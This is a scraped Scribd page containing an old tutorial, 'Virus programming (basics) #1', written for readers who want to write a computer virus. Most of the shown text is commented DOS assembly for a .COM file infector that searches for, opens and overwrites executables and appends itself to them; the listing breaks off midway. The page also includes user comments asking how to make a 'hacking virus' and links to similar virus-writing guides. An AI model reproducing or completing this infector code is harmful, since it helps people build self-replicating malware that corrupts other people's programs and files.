Vous êtes sur la page 1sur 17

Scribd </> Upload a Document </upload-document> Search Documents <#> Explore </explore> Documents </explore> * * * * * * * * * * * * * Books - Fiction </explore/Books-Fiction>

Books - Non-fiction </explore/Books-Nonfiction> Health & Medicine </explore/Health-Medicine> Brochures/Catalogs </explore/BrochuresCatalogs> Government Docs </explore/Government-Docs> How-To Guides/Manuals </explore/HowTo-GuidesManuals> Magazines/Newspapers </explore/MagazinesNewspapers> Recipes/Menus </explore/RecipesMenus> School Work </explore/School-Work> + all categories </explore> Featured </explore> Recent </explore/Most-Recent> People </community> * * * * * * * * * * * * * Authors </community/authors> Students </community/students> Researchers </community/researchers> Publishers </community/publishers> Government & Nonprofits </community/government-%26-nonprofits> Businesses </community/businesses> Musicians </community/musicians> Artists & Designers </community/artists-%26-designers> Teachers </community/teachers> + all categories </community> Most Followed </community> Popular </community?t=trending>

* Megamozg <#> o View Public Profile <http://www.scribd.com/Megamozg> o My Documents <http://www.scribd.com/documents> o My Collections <http://www.scribd.com/my_document_collections> o My Shelf <http://www.scribd.com/shelf> o Messages <http://www.scribd.com/inbox> o Notifications <http://www.scribd.com/notifications> o Account </account/edit> o Help <http://support.scribd.com> o Log Out </logout?return_to=%2Fdoc%2F2530829%2FVirus-Programming-Basics-1-Hacking Virus-Programming-Asm> inShare <javascript:void(0);>0 * Embed Doc * Copy Link *

Readcast * Collections * 21 CommentsGo Back Download Virus programming (basics) #1... -----------------------------------------------------------------This section is dedicated to those who would like to write a virus, but don't have the knowledge to do so. First of all, writing a virus is no big deal. It is an easy project, but onewhich requires some basic programming skills, and the desire to write a virus! If either of these is missing, writing a virus would be tedious indeed!. Well, if you meet these requisites, keep reading this article.... JE READ JNE FUCK_YOU! READ: The survival of a virus is based in its ability to reproduce. "So how the fuck do I make a program reproduce?", you might ask. Simple, by getting it to copy itself to other files.... The functional logic of a virus is as follows: 1 Search for a file to infect 2 - Open the file to see if it is infected 3 If infected, search for another file 4 - Else, infect the file 5 Return control to the host program. The following is an example of a simple virus: ;**************************************************************** ; START OF THE EXAMPLE: ;****************************************************************;Warning, this example is a (piece of shit?) ; The virus does not test for prior infection ; - it searches only for the first .COM file in the current ; directory

;; Careful when executing this file, since the first time it's ; executed it will search for and infect the first file in the ; directory. If we later run the newly infected file, it will find ; the first file in its directory, itself. Thus, it will re infect ; itself over and over. ;===================CODIGO=======================================;(The variables in a .COM file are relative to offset 100h). codigo segment 'code'org 100h ;Organize all the code starting ; from offset 100h assume cs:codigo,ds:codigo,es:codigo ;Define the use of the ;segments start proc far ;Start the routine COMIENZO: push cs ;Store CS push cs ;Store CS ; once again. pop ds ;Bring DS out from stack pop es ;Bring ES out from stack call falso_proc ;Call proc. so that its ; address is placed in the stack falso_proc proc near falso_proc endp pop bp ;BP<== Proc. address. sub bp, 107h ;BP<== BP Previous directory ;This is done to take the variables relative to BP, since the;infection displaces the variables at exactly the length of the ; file. At the first infection, instruction "SUB BP, 107h" is ; 107h, so that the contents of BP is 0; when I call a variable ; with "BP+VARIABLE" the value of the variable's address is not ; modified. When I load it , for example, from a 100h byte ; infected file, the instruction "SUB BP, 107h" leaves me at ; address 207h which means BP=100h, the size of the original file. ; Had I called the variable without adding BP, I would have been ; short by 100h bytes. ;Find the first .COM file in the directory

----------------------------------------mov ah, 4eh ;Search for the 1st file lea dx, bp+file_inf ;DS:DX= offset of FILE_INF;(*.*) so it will search all ;the files, including directory ;names with extensions. mov cx, 0000h ;Entry attributes int 21h ;These attributes mentioned in the commentary are the directory's; entry attributes. When I set the att ributes to 0, I'm telling ; DOS to search normal files. If I include a bit combination which ; provides the Hidden, System or Directory attributes, DOS will; search for files with those attributes, as well as the normal ; files. If the search range includes the Volume bit, the search ; is limited to that. ;These are the bits which correspond to each attribute: ;Bits: 7 6 5 4 3 2 1 0 ; . . . . . . . 1 Bit 0: Read only ; . . . . . . 1 . Bit 1: Hidden ; . . . . . 1 . . Bit 2: System ; . . . . 1 . . . Bit 3: Volume ; . . . 1 . . . . Bit 4: Directory; . . 1 . . . . . Bit 5: File; ;Bits 6 and 7 are not used as they are reserved for "future ; applications". ;Open file ; ---------------------------------------------------------------mov ah, 3dh ;Open the file. mov al, 00000010b ;read/write. mov dx, 009eh ;DX<== DTA(filename) offset int 21h ;put the handle in AX push ax ;and store in stack. ;The attributes I'm setting in AL are not the same as before.; These are the "open" attributes. We are only interested in the ; first 3 bits, ;bits 2 1 0: ; ; 0 0 0 Read only mode ; 0 0 1 Write only mode ; 0 1 0 Read/Write mode ;;OK, we now have the file attributes stored in AL. What we now ; need to do is to store in DX the offset of the variable where

; I've stored the ASCIIZ chain with the name of the file to be ; opened. In this case, we don't have a NAME_OF_FILE variable.; Instead, the name is located in the DTA (Disk Transfer Area). I; we have it in the DTA...... Why? Simply because when we search ; for a file to infect, all the information we need is returned to; this memory area. This buffer, if it was not reset, is found in ; the PSP; more precisely, it starts at offset 80h and is 43d bytes ; in size. ; ;The DTA format is as follows: ; ;Offset Bytes Function ; 00h 21d Used by DOS for the 4fh service; (search for the next file); 15h 01d Attributes of the file that's been found ; 16h 02d File tim e; 18h 02d File date ; 1Ah 04d File size in bytes ; 1Eh 13d File name in an ASCIIZ chain; (FILENAME.EXT),0;;Well, all that remains to be doe is to give DX the position in ; memory where I've stored the filename: "MOV DX, E1h" and its's ; done. But careful now, remember that DTA starts at offset 80h, ; which means I have to pass to DX the value "80h+1Eh = 9Eh". That ; would than leave "MOV DX, 9Eh"; the problem is solved. Now youare probably asking yourselves what I mean by "handle". The handleis a number which tells DOS which file we want. DOS gives us ahandle for each file we open so we have to be careful to have thecorrect handle for each file which we read/write. ;Read the first 3 bytes. ----------------------------------------------------pop bx ;I take the handle from the ;stack to BX push bx ;and I store it again. mov ah, 3fh ;Read file. mov cx, 0003h ;Read 3 bytes.lea dx, bp+buffer ;and store in the buffer. int 21h INFECTAR: ;(infect) ;Move pointer to the start. -------------------------------------------------mov ax, 4200h ;I move the write pointer ;to the beginning of the program mov cx, 0000hmov dx, 0000h int 21h ;The pointer's displacement, relative to the position of the ; pointer as specified in AL, is placed in CX and DX.; Pointer displacement modes set in AL: ; AL <== 00 Move pointer to the beginning of the file. ; AL <== 01 leave pointer where it is.; AL <== 02 Move pointer to end-

of file . ;Write the first byte (jmp) ------------------------------------------------mov ah, 40h ;write the first byte. mov cx, 1d ;Quantity=1. lea dx, bp+jump ;DX<== JUMP offset int 21h ;(Here we still need the handle, but we don't need to set it again ; because the register which contained the information was not ; modified. ; ;The first byte to be written is a JUMP instruction (the symbol for ; the jump is below). What follows the jump is the address of the ; jump, file -length + 1. (test the "+ 1" thoroughly, since this ; can cause problems; if so, multiply by 18 or subtract 23.) ; Hehehehe. ;Since the entire virus code is copied at the end of the file, the ; jump gives the virus control in an infected file. ;Calculating file length -------------------------------------------------mov cx, 2 ;Copy 2 bytes. mov si, 009ah ;SI<== DTA offset lea di, bp+longitud ;DI<== File LENGTH offset.rep movsb ;Copy. ;This instruction must have the 'SOURCE' buffer address in DS:SI ; and the address where the string will be copied in ES:DI (in this ; case, I copy the file length of the DTA to the variable ; 'LONGITUD'). of 223 Leave a Comment <http://www.scribd.com/Megamozg> Comment must not be empty. Submit Characters: 400 Ian Odonnell <http://www.scribd.com/iodonnell> Ian Odonnell <http://www.scribd.com/iodonnell> 56802221463389 reply02 / 05 / 2011 <http://www.scribd.com/events/149977965?user_id=55709820-ian-odonnell> Mahmudunnabi Mahmud <http://www.scribd.com/mahmudunnabim> Mahmudunnabi Mahmud <http://www.scribd.com/mahmudunnabim>

how i create a hacking virus with C reply01 / 18 / 2011 <http://www.scribd.com/events/137524468?user_id=41297624-mahmudunnabi-mahmud> Mahmudunnabi Mahmud <http://www.scribd.com/mahmudunnabim> Mahmudunnabi Mahmud <http://www.scribd.com/mahmudunnabim> how i create a hacking virus with C 01 / 18 / 2011 <http://www.scribd.com/events/137525776?user_id=41297624-mahmudunnabi-mahmud> <http://www.scribd.com/Bligha> Bligha <http://www.scribd.com/Bligha> Just Practice your KnOwLeDgE reply07 / 05 / 2009 <http://www.scribd.com/events/19025657?user_id=512853-still-bligha> <http://www.scribd.com/antispy> antispy <http://www.scribd.com/antispy> thank you!!! reply06 / 25 / 2009 <http://www.scribd.com/events/19016277?user_id=14058575-antispy> <http://www.scribd.com/makvan02> makvan02 <http://www.scribd.com/makvan02>

reply06 / 09 / 2009 <http://www.scribd.com/events/18999442?user_id=13553376-makvan02> <http://www.scribd.com/avinashreddyk> avinashreddyk <http://www.scribd.com/avinashreddyk> votre programeo sans e elocate tros bani gracia madi reply05 / 07 / 2009 <http://www.scribd.com/events/18966605?user_id=2610796-avinashreddyk> <http://www.scribd.com/suraj%20appacha> suraj appacha <http://www.scribd.com/suraj%20appacha> too good man reply05 / 02 / 2009 <http://www.scribd.com/events/18962326?user_id=7924892-suraj-appacha> <http://www.scribd.com/Bligha> Bligha <http://www.scribd.com/Bligha> To understand you have to learn First Assembler(quite difficult but not too much) because it is the simplest way to write your own instruction. reply02 / 25 / 2009 <http://www.scribd.com/events/18909351?user_id=512853-still-bligha> Show More <http://www.scribd.com/Megamozg> Comment must not be empty. Submit Characters: ...

Virus Programming (Basics) #1- Hacking-Virus Programming Asm Virus programming (basics) #1- Hacking-Virus Programming Asm---- How To Make Your Own Virus Download or Print /112,749 Reads/ Info and Rating Category: How-To Guides/Manuals <http://www.scribd.com/explore/HowTo-GuidesManuals> Rating: (107 Ratings) Upload Date: 04/14/2008 Copyright: Attribution Non-commercial Tags: Programming <http://www.scribd.com/tag/Programming?l=1> Technology <http://www.scribd.com/tag/Technology?l=1> programming <http://www.scribd.com/tag/programming?l=1> Hacking <http://www.scribd.com/tag/Hacking?l=1> Virus <http://www.scribd.com/tag/Virus?l=1> Asm <http://www.scribd.com/tag/Asm?l=1> (basics) <http://www.scribd.com/tag/(basics)?l=1> Uncategorizable-Uncategorizable <http://www.scribd.com/tag/Uncategorizable-Uncategorizable?l=1> (more tags <#>) Programming <http://www.scribd.com/tag/Programming?l=1> Technology <http://www.scribd.com/tag/Technology?l=1> programming <http://www.scribd.com/tag/programming?l=1> Hacking <http://www.scribd.com/tag/Hacking?l=1> Virus <http://www.scribd.com/tag/Virus?l=1> Asm <http://www.scribd.com/tag/Asm?l=1> (basics) <http://www.scribd.com/tag/(basics)?l=1> Uncategorizable-Uncategorizable <http://www.scribd.com/tag/Uncategorizable-Uncategorizable?l=1> Internet &amp; Technology <http://www.scribd.com/tag/Internet%20%26%20Technology?l=1> (fewer <#>) Flag document for inapproriate content This is a private document. </static/help?type=private> <http://www.scribd.com/Bligha> Uploaded by Bligha <http://www.scribd.com/Bligha> <#><#> Download * Embed Doc * Copy Link * Add To Collection * Comments * Readcast * Share

Share on Scribd: Readcast Search TIP Press Ctrl-F F to quickly search anywhere in the document. Search *Search History: * Searching... Result 00 of 00 00results for result for # p. More from This User Related Documents More From This User 12 p. <http://www.scribd.com/doc/38825612/Etude-de-La-Faille-DNS-Kaminsky> Etude de La Faille DNS Kaminsky <http://www.scribd.com/doc/38825612/Etude-de-La-Faille-DNS-Kaminsky> Etude de la faille DNS decouverte par Dan Kaminsky 294 p. <http://www.scribd.com/doc/38820777/Linux-Unix-Administration-Systeme> Linux, Unix Administration Systeme <http://www.scribd.com/doc/38820777/Linux-Unix-Administration-Systeme> Linux, Unix Administration Systeme, very Usefull 29 p. <http://www.scribd.com/doc/38820595/Networking-Performance-Preparation-AO> Networking & Performance - Preparation AO <http://www.scribd.com/doc/38820595/Networking-Performance-Preparation-AO> Networking & Performance - Preparation AO Next 31 p. <http://www.scribd.com/doc/38820421/Networking-Performance-Annexes> Networking & Performance - Annexes <http://www.scribd.com/doc/38820421/Networking-Performance-Annexes> Networking & Performance - Annexes 4 p. <http://www.scribd.com/doc/38819725/SNMP-in-Action> SNMP in Action <http://www.scribd.com/doc/38819725/SNMP-in-Action> implementaion over routers (quagga) 2 p. <http://www.scribd.com/doc/38819721/OSPF-in-Action> OSPF in Action <http://www.scribd.com/doc/38819721/OSPF-in-Action>

implementaion over routers (quagga) Prev Next 1 p. <http://www.scribd.com/doc/38819720/MultiCast-in-Action> MultiCast in Action <http://www.scribd.com/doc/38819720/MultiCast-in-Action> implementaion over routers (quagga) 5 p. <http://www.scribd.com/doc/38819717/IPV6-in-Action> IPV6 in Action <http://www.scribd.com/doc/38819717/IPV6-in-Action> implementaion over routers (quagga) 4 p. <http://www.scribd.com/doc/38819712/Ipsec-in-Action> Ipsec in Action <http://www.scribd.com/doc/38819712/Ipsec-in-Action> implementaion over routers (quagga) Prev Next 6 p. <http://www.scribd.com/doc/38819709/DNS-in-Action> DNS in Action <http://www.scribd.com/doc/38819709/DNS-in-Action> implementaion over routers (quagga) 2 p. <http://www.scribd.com/doc/38819703/BGP-in-Action> BGP in Action <http://www.scribd.com/doc/38819703/BGP-in-Action> implementaion over routers (quagga) 40 p. <http://www.scribd.com/doc/38819600/Grid-Cluster-in-Action> Grid&Cluster in Action <http://www.scribd.com/doc/38819600/Grid-Cluster-in-Action> Programmation parallle Gestion d'image systme : SystemImager, Gestion de... Prev Next 4 p. <http://www.scribd.com/doc/38819269/SNMP-in-Action-2> SNMP in Action 2 <http://www.scribd.com/doc/38819269/SNMP-in-Action-2> SNMP in action programed with python (interaction with router/switch), adva... 8 p. <http://www.scribd.com/doc/38819044/SNMP-in-Action-1> SNMP in Action 1 <http://www.scribd.com/doc/38819044/SNMP-in-Action-1> SNMP in action programmed with python (interaction with router/switch), Bas... 28 p. <http://www.scribd.com/doc/15650643/Report-about-Algeria-1847Rapport-sur-lAlger

ie-1847> Report about Algeria (1847),Rapport sur l'Algrie (1847), <http://www.scribd.com/doc/15650643/Report-about-Algeria-1847Rapport-sur-lAlgeri e-1847> Extraits du premier rapport de 1847 des travaux parlementaires de Tocqueville... Prev Next 181 p. <http://www.scribd.com/doc/13461497/ThesisPhDLinfluence-de-la-realite-virtuelle -nonimmersive> Thesis.PhD.L'influence de la ralit virtuelle non-immersive <http://www.scribd.com/doc/13461497/ThesisPhDLinfluence-de-la-realite-virtuellenonimmersive> Il semble exister une influence significative de la RV sur la communication ... 101 p. <http://www.scribd.com/doc/13392299/PhDThesisPrediction-of-sound-radiation-from -structures-to-assess-percpective> PhD.Thesis:Prediction of sound radiation from structures to assess ... <http://www.scribd.com/doc/13392299/PhDThesisPrediction-of-sound-radiation-fromstructures-to-assess-percpective> We try to invistigate relationship between two aspects of sound: Physical par... 136 p. <http://www.scribd.com/doc/13388932/PhD-Thesis-Statistical-Analysis-Twodimensio nal-modeling-for-segmental-signalapplication-to-speech-recognition-Signal-Image> PhD Thesis: Statistical Analysis Two-dimensional modeling for segme... <http://www.scribd.com/doc/13388932/PhD-Thesis-Statistical-Analysis-Twodimension al-modeling-for-segmental-signalapplication-to-speech-recognition-Signal-Image> PhD Thesis: Statistical Analysis Two-dimensional modeling for segmental signa... Prev Next 8 p. <http://www.scribd.com/doc/7902867/Dark-Angels-Phunky-Virus-Writing-Guide-1> Dark Angel's Phunky Virus Writing Guide #1 <http://www.scribd.com/doc/7902867/Dark-Angels-Phunky-Virus-Writing-Guide-1> Make you Virus coding more coherent a powerfull.. PRACTICE YOUR KNOWLEDGE wi... 3 p. <http://www.scribd.com/doc/7902774/How-to-Write-a-Virus-Programbegginers> How to Write a Virus Program_begginers <http://www.scribd.com/doc/7902774/How-to-Write-a-Virus-Programbegginers> Still want to learn virus Philosphy..::yao:: this is for begginers but you ne... 9 p. <http://www.scribd.com/doc/7902509/Virus-Programming-Basics-Issue-Not-So-Basic2> Virus Programming Basics Issue (Not So Basic) #2.

<http://www.scribd.com/doc/7902509/Virus-Programming-Basics-Issue-Not-So-Basic-2 > Virus programming (not so basics) #2- Hacking-Virus Programming Asm---How T... Prev Next 15 p. <http://www.scribd.com/doc/2599374/Hacker-Highschool-02-Windows-and-Linux> Hacker Highschool 02 Windows and Linux <http://www.scribd.com/doc/2599374/Hacker-Highschool-02-Windows-and-Linux> The 2ns step for Windows and Linux.Not allthings about but a short introducti... 11 p. <http://www.scribd.com/doc/2599368/Hacker-Highschool-01-Being-a-Hacker> Hacker Highschool 01 Being a Hacker <http://www.scribd.com/doc/2599368/Hacker-Highschool-01-Being-a-Hacker> The first step for being a hacker, But how ? You found what you need and ress... 4 p. <http://www.scribd.com/doc/2569323/Config-Lan-eXchange> Config Lan eXchange <http://www.scribd.com/doc/2569323/Config-Lan-eXchange> the same as the Other but this has more details ..sorry it's In French.. but ... Prev Next 4 p. <http://www.scribd.com/doc/2569301/Lan-VPN-eXchange> Lan VPN eXchange <http://www.scribd.com/doc/2569301/Lan-VPN-eXchange> How to configure 2 distant Lan with Exchange Server to communicate(one in eac... Prev Related Docuements 267 p. <http://www.scribd.com/doc/65485552/The-Ultimate-Beginner-s-Guide-To-Hacking-an d-Phreaking> The Ultimate Beginner's Guide To Hacking and Phreaking <http://www.scribd.com/doc/65485552/The-Ultimate-Beginner-s-Guide-To-Hacking-and -Phreaking> From AcE 5p1d0r <http://www.scribd.com/people/view/97234187> 267 p. <http://www.scribd.com/doc/48551525/Hacking> Hacking <http://www.scribd.com/doc/48551525/Hacking> From vasanthngr31 <http://www.scribd.com/people/view/5660182> 267 p. <http://www.scribd.com/doc/47601094/4237319-Hacking> 4237319-Hacking <http://www.scribd.com/doc/47601094/4237319-Hacking> From badboyz2050 <http://www.scribd.com/people/view/54226780> Next 267 p.

<http://www.scribd.com/doc/44738741/Hacking> Hacking <http://www.scribd.com/doc/44738741/Hacking> From Vasanth Reddy <http://www.scribd.com/people/view/33620207> 267 p. <http://www.scribd.com/doc/3474983/-HACKING-AND-PHREAKING> HACKING AND PHREAKING <http://www.scribd.com/doc/3474983/-HACKING-AND-PHREAKING> BEGINNERS GUIDE TO HACKING AND PHREAKING From suman <http://www.scribd.com/people/view/1351186> 267 p. <http://www.scribd.com/doc/37789501/14655454-Hack-Freak> 14655454-Hack-Freak <http://www.scribd.com/doc/37789501/14655454-Hack-Freak> From patychou <http://www.scribd.com/people/view/11332783> Prev Next 267 p. <http://www.scribd.com/doc/37253214/14655454-Hack-Freak> 14655454-Hack-Freak <http://www.scribd.com/doc/37253214/14655454-Hack-Freak> From patychou <http://www.scribd.com/people/view/11332783> 267 p. <http://www.scribd.com/doc/36331740/4237319-Hacking> 4237319-Hacking <http://www.scribd.com/doc/36331740/4237319-Hacking> From readerman247 <http://www.scribd.com/people/view/30182255> 267 p. <http://www.scribd.com/doc/16179095/HackFreak> -Hack-Freak <http://www.scribd.com/doc/16179095/HackFreak> From aman_arora <http://www.scribd.com/people/view/13386912> Prev Next 267 p. <http://www.scribd.com/doc/6623934/The-Ultimate-Beginners-Guide-to-Hacking-andPhreaking> The Ultimate Beginners Guide to Hacking and Phreaking <http://www.scribd.com/doc/6623934/The-Ultimate-Beginners-Guide-to-Hacking-and-P hreaking> From api_user_11797_Nivrutti Susar <http://www.scribd.com/people/view/3712211> 662 p. <http://www.scribd.com/doc/47439492/The-Giant-Black-Book-of-Computer-Viruses> The Giant Black Book of Computer Viruses <http://www.scribd.com/doc/47439492/The-Giant-Black-Book-of-Computer-Viruses> From Jimmy Senduk <http://www.scribd.com/people/view/32230674> 661 p. <http://www.scribd.com/doc/37907125/The-Giant-Book-of-Computer-Viruses> The Giant Book of Computer Viruses <http://www.scribd.com/doc/37907125/The-Giant-Book-of-Computer-Viruses> From 3141592653589793731 <http://www.scribd.com/people/view/31343723> Prev Next 661 p. <http://www.scribd.com/doc/37907103/The-Giant-Book-of-Computer-Viruses> The Giant Book of Computer Viruses <http://www.scribd.com/doc/37907103/The-Giant-Book-of-Computer-Viruses> From 3141592653589793731 <http://www.scribd.com/people/view/31343723> 661 p. <http://www.scribd.com/doc/37906229/The-Giant-Book-of-Computer-Viruses> The Giant Book of Computer Viruses <http://www.scribd.com/doc/37906229/The-Giant-Book-of-Computer-Viruses> From pyrce <http://www.scribd.com/people/view/4608461>

661 p. <http://www.scribd.com/doc/37901323/7360263-the-Giant-Black-Book-of-Computer-Vi ruses> 7360263 the Giant Black Book of Computer Viruses <http://www.scribd.com/doc/37901323/7360263-the-Giant-Black-Book-of-Computer-Vir uses> From stevenronald3136 <http://www.scribd.com/people/view/7194947> Prev Next 662 p. <http://www.scribd.com/doc/34485299/The-Giant-Black-Book-of-Computer-Viruses-JS > The Giant Black Book of Computer Viruses-JS <http://www.scribd.com/doc/34485299/The-Giant-Black-Book-of-Computer-Viruses-JS> From Vipul Verma <http://www.scribd.com/people/view/28476039> 662 p. <http://www.scribd.com/doc/24292951/The-Giant-Black-Book-of-Computer-Viruses> The Giant Black Book of Computer Viruses <http://www.scribd.com/doc/24292951/The-Giant-Black-Book-of-Computer-Viruses> This book will simply and plainly teach you how to write computer vir... From rollman1 <http://www.scribd.com/people/view/20616977> 8 p. <http://www.scribd.com/doc/36725680/Patent-Group-v-Accentra> Patent Group v. Accentra <http://www.scribd.com/doc/36725680/Patent-Group-v-Accentra> Official Complaint for False Marking in Civil Action No. 2:10-cv-00337: Paten... From PriorSmart <http://www.scribd.com/people/view/22895826> Prev Next 10 p. <http://www.scribd.com/doc/36787998/Project-Proposal> Project Proposal <http://www.scribd.com/doc/36787998/Project-Proposal> From oumer <http://www.scribd.com/people/view/1421817> 144 p. <http://www.scribd.com/doc/36803264/AIM-Mag-Issue-26-September-2010> AIM Mag Issue 26 September 2010 <http://www.scribd.com/doc/36803264/AIM-Mag-Issue-26-September-2010> A FREE MONTHLY Dolls House & Miniatures magazine written exclusively by AIM m... From Artisans in Miniature <http://www.scribd.com/people/view/6588255> 2 p. <http://www.scribd.com/doc/36846522/Morning-News-Notes-2010-09-03> Morning News Notes: 2010-09-03 <http://www.scribd.com/doc/36846522/Morning-News-Notes-2010-09-03> Morning News Notes: 2010-09-03 From glerner133926 <http://www.scribd.com/people/view/5813859> Prev Next 1 p. <http://www.scribd.com/doc/36895006/Readme> Readme <http://www.scribd.com/doc/36895006/Readme> From AlainN2200 <http://www.scribd.com/people/view/32565805> 249 p.

<http://www.scribd.com/doc/36914712/Learn-French> Learn French <http://www.scribd.com/doc/36914712/Learn-French> From ammuprem <http://www.scribd.com/people/view/6608850> 40 p. <http://www.scribd.com/doc/36915444/16/FCFF-Definition-Issues> FCFF: Definition Issues <http://www.scribd.com/doc/36915444/16/FCFF-Definition-Issues> From goldi0172 <http://www.scribd.com/people/view/16352834> Prev Next 40 p. <http://www.scribd.com/doc/36915444/1/Valuation-Situations> Valuation Situations <http://www.scribd.com/doc/36915444/1/Valuation-Situations> From goldi0172 <http://www.scribd.com/people/view/16352834> 40 p. <http://www.scribd.com/doc/36915444/6-Valuation-Measurement-and-Creation-Septem ber-04> 6. Valuation Measurement and Creation_September 04 <http://www.scribd.com/doc/36915444/6-Valuation-Measurement-and-Creation-Septemb er-04> From goldi0172 <http://www.scribd.com/people/view/16352834> 33 p. <http://www.scribd.com/doc/36969934/QOS-Measurement-for-Broadband> QOS Measurement for Broadband <http://www.scribd.com/doc/36969934/QOS-Measurement-for-Broadband> From aloksoni14 <http://www.scribd.com/people/view/32629140> Prev Next 3 p. <http://www.scribd.com/doc/36999554/SS> SS <http://www.scribd.com/doc/36999554/SS> From Abd El-Rahman El-Sayed <http://www.scribd.com/people/view/32655400> 21 p. <http://www.scribd.com/doc/37043772/Project-Movement-06-9-2010> Project Movement 06-9-2010 <http://www.scribd.com/doc/37043772/Project-Movement-06-9-2010> From Lokesh Reddy <http://www.scribd.com/people/view/32223701> 16 p. <http://www.scribd.com/doc/37046376/ABC-Inventory-Control-Analysis> ABC Inventory Control Analysis <http://www.scribd.com/doc/37046376/ABC-Inventory-Control-Analysis> ABC inventory control analysis and other such models From anuragbhardwaj07 <http://www.scribd.com/people/view/32684819> Prev Next 12 p. <http://www.scribd.com/doc/37095814/Learning-Memory-Presentation-1> Learning & Memory Presentation 1 <http://www.scribd.com/doc/37095814/Learning-Memory-Presentation-1> From Brendon Fulton <http://www.scribd.com/people/view/29956663> 201 p. <http://www.scribd.com/doc/37097380/1887-Beharistan> 1887-Beharistan <http://www.scribd.com/doc/37097380/1887-Beharistan> From mapancha <http://www.scribd.com/people/view/580118> 28 p. <http://www.scribd.com/doc/37128108/Seeking-Out-As-Presented> Seeking Out - As Presented <http://www.scribd.com/doc/37128108/Seeking-Out-As-Presented> the slides accompanying my presentation for the St Andrew's Patristic

Symposi... From Doru Costache <http://www.scribd.com/people/view/163926> Prev Next 25 p. <http://www.scribd.com/doc/37177236/TGoST-Study-Guide> TGoST Study Guide <http://www.scribd.com/doc/37177236/TGoST-Study-Guide> From tamalamajama <http://www.scribd.com/people/view/22662000> 6 p. <http://www.scribd.com/doc/37254856/1264321179-Tutorial-Class> 1264321179 Tutorial Class <http://www.scribd.com/doc/37254856/1264321179-Tutorial-Class> From Prasanna Kumar <http://www.scribd.com/people/view/27981604> 7 p. <http://www.scribd.com/doc/37341850/Linux-Dos-Win95-Os2> Linux+Dos+Win95+Os2 <http://www.scribd.com/doc/37341850/Linux-Dos-Win95-Os2> From ykmiss99 <http://www.scribd.com/people/view/32932559> Prev Next 13 p. <http://www.scribd.com/doc/37351788/22161565-Difference-Between-Dbms-and-Rdbms> 22161565 Difference Between Dbms and Rdbms <http://www.scribd.com/doc/37351788/22161565-Difference-Between-Dbms-and-Rdbms> From mandeepdhaliwal <http://www.scribd.com/people/view/19924276> 1 p. <http://www.scribd.com/doc/37375006/Jingle-Bell-Run-Sponsorship-Form> Jingle Bell Run Sponsorship Form <http://www.scribd.com/doc/37375006/Jingle-Bell-Run-Sponsorship-Form> From api_19566_158172 <http://www.scribd.com/people/view/32955105> 13 p. <http://www.scribd.com/doc/37391582/ERGTIUERGR> ERGTIUERGR <http://www.scribd.com/doc/37391582/ERGTIUERGR> From Anshul Purwar <http://www.scribd.com/people/view/31248773> Prev Upload a Document </upload-document> Search Documents <#> * * * * * * * * * * * * * * * * * Follow Us! scribd.com/scribd </scribd> twitter.com/scribd <http://twitter.com/scribd> facebook.com/scribd <http://www.facebook.com/pages/Scribd/6978454082> About </about> Press </static/press> Blog <http://blog.scribd.com/> Partners </partners> Scribd 101 </scribd101> Web Stuff </webstuff> Support <http://support.scribd.com> FAQ </faq> Developers / API </developers> Jobs </jobs> Terms </terms> Copyright </copyright> Privacy </privacy>

Copyright 2012 Scribd Inc. Language: English <#> Choose the language in which you want to experience Scribd:

* English </language?destination=http%3A%2F%2Fwww.scribd.com%2Fdoc%2F2530829%2FVirus-P rogramming-Basics-1-HackingVirus-Programming-Asm&id=en> * Espaol </language?destination=http%3A%2F%2Fwww.scribd.com%2Fdoc%2F2530829%2FVirus-P rogramming-Basics-1-HackingVirus-Programming-Asm&id=es> * Portugus </language?destination=http%3A%2F%2Fwww.scribd.com%2Fdoc%2F2530829%2FVirus-P rogramming-Basics-1-HackingVirus-Programming-Asm&id=pt> scribd. scribd. scribd. scribd. scribd. scribd. scribd. scribd. scribd. Download This Document TXT * PDF * TXT *Document size: *467.043 409.248 *Document name: *2530829-Virus-Programming-Basics-1-HackingVirus-Programming-Asm.pdf.txt Download TXT Your download has started. Close this dialog. Having trouble downloading? Try again.